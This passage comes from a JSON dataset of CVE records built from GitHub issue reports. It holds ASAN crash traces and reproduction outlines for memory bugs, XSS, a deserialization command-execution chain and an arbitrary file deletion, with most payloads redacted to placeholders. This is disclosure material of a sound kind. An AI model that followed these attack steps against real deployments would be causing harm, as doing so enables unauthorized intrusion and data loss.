left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc NUMBERTAG ABORTING Please reproduce this issue through the following APITAG PATHTAG APITAG policy_update_recommendsmap NUMBERTAG URLTAG If you configure CC with flag fsanitize=address, you will get the following outputs: testcase_read: system: unknown repo 'system' str2job: bad line APITAG result: unknown flag 'trans >erase' testcase_read: could not open PATHTAG testcase_read: cannot parse command 'sysine>' testcase_read: could not open PATHTAG testcase_read: cannot parse command APITAG testcase_read: cannot parse command 'sysine>' testcase_read: could not open PATHTAG str2job: bad line APITAG result: unknown flag 'trans >erase' testcase_read: could not open PATHTAG testcase_read: cannot parse command '\u049cX' str2job: bad line 'provrovides E' result: unknown flag 'transction' APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG at pc NUMBERTAG f2e7ddb NUMBERTAG c2 bp NUMBERTAG ffcf NUMBERTAG f0 sp NUMBERTAG ffcf NUMBERTAG e8 READ of size NUMBERTAG at NUMBERTAG thread T NUMBERTAG f2e7ddb NUMBERTAG c1 in prune_to_recommended PATHTAG NUMBERTAG f2e7ddb NUMBERTAG c1 in policy_filter_unwanted PATHTAG NUMBERTAG f2e7de3b5af in solver_choicerulecheck PATHTAG NUMBERTAG f2e7de3b5af in solver_addchoicerules PATHTAG NUMBERTAG f2e7dc NUMBERTAG in solver_solve PATHTAG NUMBERTAG f1eea in main PATHTAG NUMBERTAG f2e7cc3dbf6 in __libc_start_main PATHTAG NUMBERTAG e6f9 in _start ( PATHTAG NUMBERTAG is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG abe NUMBERTAG in calloc PATHTAG NUMBERTAG f2e7dd9af NUMBERTAG in solv_calloc PATHTAG NUMBERTAG f2e7dc NUMBERTAG dba in map_init PATHTAG NUMBERTAG f2e7dc NUMBERTAG abe in solver_create PATHTAG NUMBERTAG f2e NUMBERTAG da2d4 in testcase_read PATHTAG NUMBERTAG f NUMBERTAG b in main PATHTAG NUMBERTAG f2e7cc3dbf6 in __libc_start_main PATHTAG SUMMARY: APITAG heap buffer overflow PATHTAG in prune_to_recommended Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG fff7fb NUMBERTAG c NUMBERTAG fff7fc NUMBERTAG c NUMBERTAG fff7fd NUMBERTAG c NUMBERTAG fff7fe NUMBERTAG c NUMBERTAG fff7ff NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa fd fd NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fd fa fa fa fd fd fa fa NUMBERTAG fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa NUMBERTAG Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc NUMBERTAG ABORTING",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-33961",
        "Issue_Url_old": "https://github.com/softvar/enhanced-github/issues/96",
        "Issue_Url_new": "https://github.com/softvar/enhanced-github/issues/96",
        "Repo_new": "softvar/enhanced-github",
        "Issue_Created_At": "2021-05-21T10:31:25Z",
        "description": "Stored XSS Vulnerable. Use a browser that has installed extensions to access a APITAG repository containing malicious xss code in the file name, and you will be attacked by xss vulnerability\u3002 as follows\uff1a URLTAG Vulnerability repair suggestions\uff1a Filter keywords and characters: javascript APITAG APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-33988",
        "Issue_Url_old": "https://github.com/nck0099/osTicket/issues/2",
        "Issue_Url_new": "https://github.com/nck0099/osticket/issues/2",
        "Repo_new": "nck0099/osticket",
        "Issue_Created_At": "2021-05-23T18:49:14Z",
        "description": "Microweber APITAG Reflected XSS. Microweber Reflected XSS Vuln Description: APITAG XSS attacks, also known as non persistent attacks, occur when a malicious script is reflected of a web application to the victim's browser. The script is activated through a link, which sends a request to a website with a vulnerability that enables execution of malicious scripts._ Impact: High APITAG impact of an exploited XSS vulnerability on a web application varies a lot. It ranges from user's Session Hijacking, and if used in conjunction with a social engineering attack it can also lead to disclosure of sensitive data._ POC: Identified un Authenticated XSS on microweber CMS Version NUMBERTAG APITAG request is modified to insert XSS payload FILETAG NUMBERTAG SS payload inserted in has been executed as shown in the snapshot. FILETAG Request: CODETAG Response: CODETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-3403",
        "Issue_Url_old": "https://github.com/Yeraze/ytnef/issues/85",
        "Issue_Url_new": "https://github.com/yeraze/ytnef/issues/85",
        "Repo_new": "yeraze/ytnef",
        "Issue_Created_At": "2021-01-30T11:51:22Z",
        "description": "Double free via APITAG While it seems there are many checks which ought to prevent various memory corruption situations it seems there's a double free that can be triggered still. With ASAN and some crafted input: ERRORTAG Manually instrumenting the code shows that indeed the same memory is freed twice: ERRORTAG I have attached a minimal reproducer of this crash: FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-3404",
        "Issue_Url_old": "https://github.com/Yeraze/ytnef/issues/86",
        "Issue_Url_new": "https://github.com/yeraze/ytnef/issues/86",
        "Repo_new": "yeraze/ytnef",
        "Issue_Created_At": "2021-01-30T11:51:28Z",
        "description": "Heap buffer overflow via APITAG A heap buffer overflow can be triggered with crafted input, despite ytnef recognizing that the provided input file is not valid: ERRORTAG However when built with ASAN we see that APITAG attempts to read invalid memory before said error message can be printed: ERRORTAG I have attached a minimal reproducer of this crash: FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-3405",
        "Issue_Url_old": "https://github.com/Matroska-Org/libebml/issues/74",
        "Issue_Url_new": "https://github.com/matroska-org/libebml/issues/74",
        "Repo_new": "matroska-org/libebml",
        "Issue_Created_At": "2021-02-07T14:10:51Z",
        "description": "APITAG heap overflow bug on NUMBERTAG bit builds NUMBERTAG Summary An extremely exploitable heap overflow bug exists in the implementation of APITAG and APITAG in libebml. This bug is reachable from the current stable release of vlc NUMBERTAG Discussion The issue exists in the calculation of the required buffer size to store the string. The following calculation is performed NUMBERTAG auto Buffer = new (std::nothrow) APITAG NUMBERTAG APITAG APITAG The value returned from APITAG is guaranteed to be an unisigned NUMBERTAG bug number, and due to the way in which intetgers are stored and parsed in Ebml will only use the lowest NUMBERTAG bits. This guarantees that the integer cannot overflow on NUMBERTAG but builds. However, on NUMBERTAG bit builds, the value is implicitly cast to a size_t in the call to new, meaning that the truncated length can be significantly shorter than the amount of data to be copied. For example, if the length of the string element is claimed to be NUMBERTAG ffffffff, the resultant allocation will be NUMBERTAG The cast to a NUMBERTAG bit size_t drops the top NUMBERTAG bit, meaning an array of size zero is allocated. In the event that the string element is placed maliciously at the end of the file to be parsed, an extremely exploitable controlled heap overflow can occur NUMBERTAG Resolution The fix for this bug is relatively straightforward, a check must be added to ensure that the value of APITAG NUMBERTAG is less than SIZE_MAX to ensure that it will not be truncated in the call to new NUMBERTAG Proof of Concept The following proof of concept file shows the behaviour in the latest (at time of writing) version of vlc on Ubuntu NUMBERTAG sudo apt install vlc:i NUMBERTAG gdb $ wget FILETAG $ gdb q vlc $$ r libebml poc.mkv",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-34066",
        "Issue_Url_old": "https://github.com/EdgeGallery/developer-be/issues/1",
        "Issue_Url_new": "https://github.com/edgegallery/developer-be/issues/1",
        "Repo_new": "edgegallery/developer-be",
        "Issue_Created_At": "2021-05-25T08:46:01Z",
        "description": "There is a Deserialization vulnerability that can execute system command.. vulnerability type: Deserialization of Untrusted Data impact: system command execution app version: Edgegallery/developer NUMBERTAG Create a META INF/services file, and create a APITAG file, and write what needs to be loaded The name of the class is pocy, and the files of this class are placed in the same directory as META INF: FILETAG NUMBERTAG File content: FILETAG NUMBERTAG Start an httpserver server: APITAG NUMBERTAG Prepare yaml POC: APITAG NUMBERTAG Install and access the APITAG module, click APITAG and debug\" > APITAG FILETAG NUMBERTAG Upload the constructed yaml file FILETAG Click to upload the created yaml file. FILETAG NUMBERTAG iew the request information of the http server: FILETAG NUMBERTAG Construct the pocy of the creation command: (contain the \"touch /tmp/hackercor0ps\" command) ERRORTAG NUMBERTAG Log in to the host and verify whether the command is executed successfully. FILETAG We can see that the \u201ctouch /tmp/hackercor0ps\u201d command was successfully executed.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-34067",
        "Issue_Url_old": "https://github.com/justdan96/tsMuxer/issues/424",
        "Issue_Url_new": "https://github.com/justdan96/tsmuxer/issues/424",
        "Repo_new": "justdan96/tsmuxer",
        "Issue_Created_At": "2021-05-22T16:27:48Z",
        "description": "heap buffer overflow in APITAG Hi, please see asan output and poc file below. System info\uff1a Ubuntu NUMBERTAG APITAG version git f6ab2a2 APITAG version git f6ab2a2. PATHTAG This HEVC stream doesn't contain fps value. Muxing fps is absent too. Set muxing FPS to default NUMBERTAG alue. HEVC manual defined fps doesn't equal to stream fps. Change HEVC fps from NUMBERTAG to NUMBERTAG APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG eaf2 at pc NUMBERTAG c bp NUMBERTAG ffc6a2a NUMBERTAG sp NUMBERTAG ffc6a2a NUMBERTAG READ of size NUMBERTAG at NUMBERTAG eaf2 thread T NUMBERTAG b in APITAG PATHTAG NUMBERTAG b in APITAG int, int) PATHTAG NUMBERTAG af in APITAG , unsigned char , unsigned char , int) PATHTAG NUMBERTAG f NUMBERTAG in APITAG , unsigned char , unsigned char , int) PATHTAG NUMBERTAG bfa4 in APITAG char , int) PATHTAG NUMBERTAG d0b NUMBERTAG in APITAG char , int, APITAG int, int) PATHTAG NUMBERTAG c NUMBERTAG in APITAG APITAG std::char_traits APITAG , std::allocator APITAG > const&, bool) PATHTAG NUMBERTAG df NUMBERTAG e in APITAG const , APITAG , bool) PATHTAG NUMBERTAG efd NUMBERTAG in main PATHTAG NUMBERTAG fb NUMBERTAG in __libc_start_main PATHTAG NUMBERTAG ebded in _start ( PATHTAG NUMBERTAG eaf5 is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG d in operator APITAG long) ( PATHTAG NUMBERTAG in APITAG char const , unsigned char const ) PATHTAG SUMMARY: APITAG heap buffer overflow PATHTAG in APITAG Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG fffbd NUMBERTAG fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fa NUMBERTAG c NUMBERTAG fffbd NUMBERTAG fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fa NUMBERTAG c NUMBERTAG fffbd NUMBERTAG fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fa NUMBERTAG c NUMBERTAG fffbd NUMBERTAG fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fa NUMBERTAG c NUMBERTAG fffbd NUMBERTAG fa fa fd fd fd fd fd fa fa fa NUMBERTAG c NUMBERTAG fffbd NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG fa NUMBERTAG c NUMBERTAG fffbd NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fffbd NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fffbd NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fffbd NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fffbda0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc NUMBERTAG ABORTING",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-34068",
        "Issue_Url_old": "https://github.com/justdan96/tsMuxer/issues/427",
        "Issue_Url_new": "https://github.com/justdan96/tsmuxer/issues/427",
        "Repo_new": "justdan96/tsmuxer",
        "Issue_Created_At": "2021-05-24T18:09:22Z",
        "description": "heap buffer overflow in APITAG Hi, please see asan output and poc file below. Found by Cem Onat Karagun of Diesec System info\uff1a APITAG To run APITAG after unzip: APITAG FILETAG Asan output: ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-34069",
        "Issue_Url_old": "https://github.com/justdan96/tsMuxer/issues/428",
        "Issue_Url_new": "https://github.com/justdan96/tsmuxer/issues/428",
        "Repo_new": "justdan96/tsmuxer",
        "Issue_Created_At": "2021-05-24T18:10:51Z",
        "description": "Denial of Service in APITAG Hi, please see asan output and poc file below. Found by Cem Onat Karagun of Diesec . System info\uff1a APITAG To run APITAG after unzip: APITAG FILETAG ASAN output: ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-34070",
        "Issue_Url_old": "https://github.com/justdan96/tsMuxer/issues/426",
        "Issue_Url_new": "https://github.com/justdan96/tsmuxer/issues/426",
        "Repo_new": "justdan96/tsmuxer",
        "Issue_Created_At": "2021-05-24T13:22:08Z",
        "description": "Out of bounds Read in APITAG of APITAG Greetings, APITAG has an Out of bounds Read issue whenever runs with the APITAG sample. Found by Cem Onat Karagun of Diesec System info\uff1a APITAG To run APITAG after unzip: APITAG FILETAG Chronological Function Call Trace NUMBERTAG APITAG const , APITAG , bool) PATHTAG NUMBERTAG APITAG APITAG std::char_traits APITAG , std::allocator APITAG > const&, bool) PATHTAG NUMBERTAG APITAG char , int, APITAG int, int) PATHTAG NUMBERTAG APITAG char , int) PATHTAG NUMBERTAG APITAG PATHTAG NUMBERTAG APITAG PATHTAG Root Cause of The Issue: Constant integer arrays are defined in APITAG APITAG However, the array index nr is set to NUMBERTAG therefore nr NUMBERTAG is larger than boundary of array ff_vc1_fps_nr. CODETAG A similar \"demo\" issue is also shared in following page: [ URLTAG URLTAG I'm sharing the link above, because ASAN declares this issue as \"global buffer overflow\" but as shared in References and root cause sections this is actually a OOB read issue. Recommendation: Editing size check of \"array index\" within \"if condition\" in line NUMBERTAG might fix this \"particular\" issue. An additional check of index variables (dr and nr) for NUMBERTAG is recommended . APITAG Fix: APITAG References: FILETAG Address Sanitizer Output: ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-34071",
        "Issue_Url_old": "https://github.com/justdan96/tsMuxer/issues/423",
        "Issue_Url_new": "https://github.com/justdan96/tsmuxer/issues/423",
        "Repo_new": "justdan96/tsmuxer",
        "Issue_Created_At": "2021-05-22T16:27:04Z",
        "description": "heap buffer overflow in APITAG Hi, please see asan output and poc file below. System info\uff1a Ubuntu NUMBERTAG APITAG version git f6ab2a2 Asan output: APITAG version git f6ab2a2. PATHTAG APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG f5 at pc NUMBERTAG f NUMBERTAG bp NUMBERTAG ffebdd7b NUMBERTAG sp NUMBERTAG ffebdd7b NUMBERTAG READ of size NUMBERTAG at NUMBERTAG f5 thread T NUMBERTAG f NUMBERTAG in APITAG int) PATHTAG NUMBERTAG e NUMBERTAG in APITAG char , int) PATHTAG NUMBERTAG ceacc in APITAG char , int, APITAG int, int) PATHTAG NUMBERTAG c NUMBERTAG in APITAG APITAG std::char_traits APITAG , std::allocator APITAG > const&, bool) PATHTAG NUMBERTAG df NUMBERTAG e in APITAG const , APITAG , bool) PATHTAG NUMBERTAG efd NUMBERTAG in main PATHTAG NUMBERTAG fb1de NUMBERTAG a NUMBERTAG in __libc_start_main PATHTAG NUMBERTAG ebded in _start ( PATHTAG NUMBERTAG f5 is located NUMBERTAG bytes to the right of NUMBERTAG byte region FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-3410",
        "Issue_Url_old": "https://github.com/cacalabs/libcaca/issues/52",
        "Issue_Url_new": "https://github.com/cacalabs/libcaca/issues/52",
        "Repo_new": "cacalabs/libcaca",
        "Issue_Created_At": "2021-02-14T02:07:08Z",
        "description": "CVETAG . Following vulnerability has been reported to Red Hat issue tracker: CVETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-34122",
        "Issue_Url_old": "https://github.com/rockcarry/ffjpeg/issues/36",
        "Issue_Url_new": "https://github.com/rockcarry/ffjpeg/issues/36",
        "Repo_new": "rockcarry/ffjpeg",
        "Issue_Created_At": "2021-05-13T09:08:27Z",
        "description": "null pointer dereference in function APITAG in bitstr.c. Hi, There is null pointer dereference in function APITAG and APITAG in bitstr.c. Didn't check whether the stream is valid . CODETAG version NUMBERTAG ab ERRORTAG e (latest one) env ubuntu NUMBERTAG gcc version NUMBERTAG reproduce: make ./ffjpeg e poc FILETAG debug info CODETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-34129",
        "Issue_Url_old": "https://github.com/bettershop/LaikeTui/issues/9",
        "Issue_Url_new": "https://github.com/bettershop/laiketui/issues/9",
        "Repo_new": "bettershop/laiketui",
        "Issue_Created_At": "2021-06-01T15:55:50Z",
        "description": "Arbitrary file deletion leads to system reinstallation vulnerabilities. When the system is successfully installed, the system will generate the APITAG file in the /data/ directory. When the user wants to reinstall, it will first determine whether the APITAG file exists. If it exists, the installation cannot be repeated, but we can find one To delete any file, delete the APITAG file, you can directly reinstall the system. The parameters APITAG $oldpic, and $imgurl are all controllable\uff1a FILETAG Vulnerability recurrence: first log in to the background to access the link : URLTAG domain PATHTAG then publish an article. FILETAG Then modify the article: FILETAG Before proceeding with any file deletion, visit the install directory: FILETAG Replace parameters and delete any files: FILETAG FILETAG Visit the install directory again and find that arbitrary file deletion has been implemented, which leads to reinstallation vulnerabilities. FILETAG ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.2,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-34141",
        "Issue_Url_old": "https://github.com/numpy/numpy/issues/18993",
        "Issue_Url_new": "https://github.com/numpy/numpy/issues/18993",
        "Repo_new": "numpy/numpy",
        "Issue_Created_At": "2021-05-12T02:04:35Z",
        "description": "Unsecure string comparison (incomplete comparison) in _convert_from_str of descriptor.c. APITAG Reproducing code example: Snippet : / Check for a deprecated Numeric style typecode / / Uint has deliberately weird uppercasing / char dep_tps FILETAG APITAG version information: the main branch of APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
        "severity": "MEDIUM",
        "baseScore": 5.3,
        "impactScore": 1.4,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-34184",
        "Issue_Url_old": "https://github.com/mackron/miniaudio/issues/319",
        "Issue_Url_new": "https://github.com/mackron/miniaudio/issues/319",
        "Repo_new": "mackron/miniaudio",
        "Issue_Created_At": "2021-06-06T15:45:59Z",
        "description": "Double free vulnerability cause buffer overflow. Hi Team, Double Free vulnerability cause buffer overflow is observed in FILETAG while fuzzing MINIAUDIO APITAG and master branch) using ASAN with AFL FUZZER Steps to Reproduce cd examples afl gcc fsanitize=address fsanitize=leak fsanitize=undefined simple_looping.c o simple_looping ldl lm lpthread ./simple_looping POC1 Download link to POC1 URLTAG OUTPUT APITAG NUMBERTAG ERROR: APITAG attempting double free on NUMBERTAG in thread T NUMBERTAG f NUMBERTAG cf in __interceptor_free ( PATHTAG NUMBERTAG f NUMBERTAG in _IO_fclose ( PATHTAG NUMBERTAG f NUMBERTAG in __interceptor_fclose ( PATHTAG NUMBERTAG b7e0b in ma_default_vfs_close__stdio .. APITAG NUMBERTAG b7e0b in ma_default_vfs_close .. APITAG NUMBERTAG b7e0b in ma_vfs_or_default_close .. APITAG NUMBERTAG b7e0b in ma_vfs_or_default_close .. APITAG NUMBERTAG b7e0b in ma_decoder_init_vfs .. APITAG NUMBERTAG in ma_decoder_init_file .. APITAG NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG a NUMBERTAG b2 in __libc_start_main ( PATHTAG NUMBERTAG d in _start ( PATHTAG NUMBERTAG is located NUMBERTAG bytes inside of NUMBERTAG byte region APITAG freed by thread T0 here NUMBERTAG f NUMBERTAG cf in __interceptor_free ( PATHTAG NUMBERTAG f NUMBERTAG in _IO_fclose ( PATHTAG ) previously allocated by thread T0 here NUMBERTAG f NUMBERTAG bc8 in malloc ( PATHTAG NUMBERTAG f NUMBERTAG aad in _IO_fopen ( PATHTAG ) SUMMARY: APITAG double free ( PATHTAG ) in __interceptor_free NUMBERTAG ABORTING Request team to implement proper patch and validate",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-34185",
        "Issue_Url_old": "https://github.com/mackron/miniaudio/issues/320",
        "Issue_Url_new": "https://github.com/mackron/miniaudio/issues/320",
        "Repo_new": "mackron/miniaudio",
        "Issue_Created_At": "2021-06-06T15:51:52Z",
        "description": "Integer based buffer overflow vulnerability. Hi Team, Integer based buffer overflow caused by out of bound left shift is observed in FILETAG while fuzzing MINIAUDIO APITAG and master branch) using UBSAN enabled in AFL FUZZER Vulnerable code from miniaudio.h DRWAV_API drwav_uint NUMBERTAG drwav_bytes_to_u NUMBERTAG const drwav_uint8 data) { return (data NUMBERTAG data NUMBERTAG data NUMBERTAG data NUMBERTAG Steps to Reproduce cd examples afl gcc fsanitize=address fsanitize=leak fsanitize=undefined simple_looping.c o simple_looping ldl lm lpthread ./simple_looping POC2 Download link to [POC2 URLTAG OUTPUT .. APITAG runtime error: left shift of NUMBERTAG by NUMBERTAG places cannot be represented in type 'int' Request team to implement proper patch and validate",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-34254",
        "Issue_Url_old": "https://github.com/umbraco/Umbraco-CMS/issues/9782",
        "Issue_Url_new": "https://github.com/umbraco/umbraco-cms/issues/9782",
        "Repo_new": "umbraco/umbraco-cms",
        "Issue_Created_At": "2021-02-09T07:16:26Z",
        "description": "NUMBERTAG Open redirect security issue insufficient url sanitization on APITAG Summary A security report alerted us to an issue where APITAG could be used as an open redirect URLTAG , which is used for phishing attacks, making it seem that the URL you're clicking is a legitimate site, but you get redirected to a malicious site by that legitimate site. Note that anybody trying to use this vulnerability on your Umbraco site would see the following interstitial page for NUMBERTAG seconds: FILETAG Severity We rate this as a medium level security problem. Although the exploit is available for an unauthenticated attacker, no data can be altered on the target Umbraco site. Mitigation Umbraco NUMBERTAG mitigates the specific exploit method and we advise you to upgrade to that version. Workarounds for older versions Alternatively, for any site with a version lower than NUMBERTAG we recommend you remove APITAG , which will mitigates the problem as well. This file is not often in active use and is therefore safe to remove for most people. Alternatively, if you think your site is often displaying the booting screen, you can update this page, with FILETAG . Please note that your deployment strategy might include a APITAG restore which will restore APITAG on each deploy, make sure to take steps to prevent this file from being deployed. Similarly, if you do update APITAG without upgrading to Umbraco NUMBERTAG APITAG will overwrite it, so make sure that you only deploy the updated version. Credits We'd like to thank Marcin W\u0119g\u0142owski and Mariusz Pop\u0142awski from FILETAG for reporting the issue and validating the fix.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-34259",
        "Issue_Url_old": "https://github.com/STMicroelectronics/STM32CubeH7/issues/76",
        "Issue_Url_new": "https://github.com/stmicroelectronics/stm32cubeh7/issues/76",
        "Repo_new": "stmicroelectronics/stm32cubeh7",
        "Issue_Created_At": "2020-10-14T22:38:58Z",
        "description": "No validity checking on the variable cfg_desc APITAG Describe the set up Software: APITAG MCU & MPU Packages Version: APITAG Verification Hardware Platform: STM NUMBERTAG H7B3 Describe the bug Function: static void APITAG cfg_desc, uint8_t buf, uint NUMBERTAG t length) Location: URLTAG Type: Buffer Overflow Result: The system could be configured incorrectly with wrong parameters. Description: The function APITAG parses the configuration descriptor, interface descriptor, and endpoint descriptor by input data from a USB device. However, it doesn\u2019t check the validity of the variable cfg_desc APITAG compared with the total length of the input buffer as shown in URLTAG This will cause the following program including calling to the function APITAG APITAG and APITAG configure the system incorrectly. How To Reproduce NUMBERTAG Running APITAG application on the STM NUMBERTAG H7B3I platform NUMBERTAG Plug a usb disk NUMBERTAG Use the attached FILETAG to replace USB device packet Additional context To patch it, the program should check if reach the end of input buffer when plus cfg_desc APITAG FILETAG",
        "vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.8,
        "impactScore": 5.9,
        "exploitabilityScore": 0.9
    },
    {
        "CVE_ID": "CVE-2021-34260",
        "Issue_Url_old": "https://github.com/STMicroelectronics/STM32CubeH7/issues/83",
        "Issue_Url_new": "https://github.com/stmicroelectronics/stm32cubeh7/issues/83",
        "Repo_new": "stmicroelectronics/stm32cubeh7",
        "Issue_Created_At": "2020-10-14T23:17:15Z",
